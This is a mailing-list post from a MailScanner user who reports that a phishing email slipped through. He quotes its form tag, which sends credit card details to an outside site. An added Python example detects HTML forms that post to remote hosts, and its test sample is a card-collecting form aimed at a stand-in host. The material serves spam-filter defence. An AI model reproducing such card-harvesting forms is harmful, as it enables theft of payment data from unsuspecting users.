HTML form scanning?

Jon Dustin jdustin at usm.maine.edu
Mon Apr 6 16:47:46 IST 2009


Greetings -

I have MailScanner v4.74.16-1 running on a few SLES boxes. Hopefully this is "recent enough" for most features.

This morning an "interesting" mailfile slipped through MS:

http://pastebin.com/mfeceab6 

If you care to decode the base64 attachment, it is an HTML form that appears to take much of its content from Visa, with one key change:

form name="frm" action="http://vatamu.org/vbv/w.php" method="post" onsubmit="return valFrm()"

If I'm not mistaken, this is trying to redirect the user's credit card details to vatamu.org. 

Should this message have been flagged? Or at least been marked in the HTML-part as "fraud attempt"?

Or is the encoded-part throwing off MS? Thanks for any assistance/suggestions you may be able to provide.

-- 

 
Jon Dustin - Network Specialist
University of Southern Maine
Portland, ME  207-780-4152
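
As an added example (not part of the original post and not MailScanner's own code), one way to check a message for the pattern described above: decode each HTML part, including base64-encoded attachments, and report any form whose action is an absolute URL on a remote host. The sample message, the host collector.example, and the function names are constructed for illustration.

```python
import email
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionParser(HTMLParser):
    """Collects the action URL of every <form> tag."""

    def __init__(self):
        super().__init__()
        self.actions = []

    def handle_starttag(self, tag, attrs):
        if tag == "form":
            self.actions.append(dict(attrs).get("action") or "")


def external_form_actions(raw_message):
    """Return (filename, host) for each HTML part whose form posts to a remote host."""
    findings = []
    msg = email.message_from_string(raw_message)
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        # decode=True undoes the Content-Transfer-Encoding (base64 here).
        body = part.get_payload(decode=True) or b""
        charset = part.get_content_charset() or "utf-8"
        parser = FormActionParser()
        parser.feed(body.decode(charset, errors="replace"))
        for action in parser.actions:
            host = urlparse(action).hostname
            if host:  # absolute URL: submitted data goes to a remote server
                findings.append((part.get_filename() or "(inline)", host))
    return findings


def build_sample():
    """Constructed sample: a base64 HTML attachment with a remote form action."""
    html = ('<html><body><form name="frm" method="post" '
            'action="http://collector.example/w.php">'
            '<input name="card"></form></body></html>')
    msg = EmailMessage()
    msg["Subject"] = "Account verification"
    msg.set_content("Please complete the attached form.")
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="form.html")
    return msg.as_string()


if __name__ == "__main__":
    print(external_form_actions(build_sample()))
```

The raw message text never contains the form's target host in readable form, so a check that matches on the undecoded message body would miss it.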



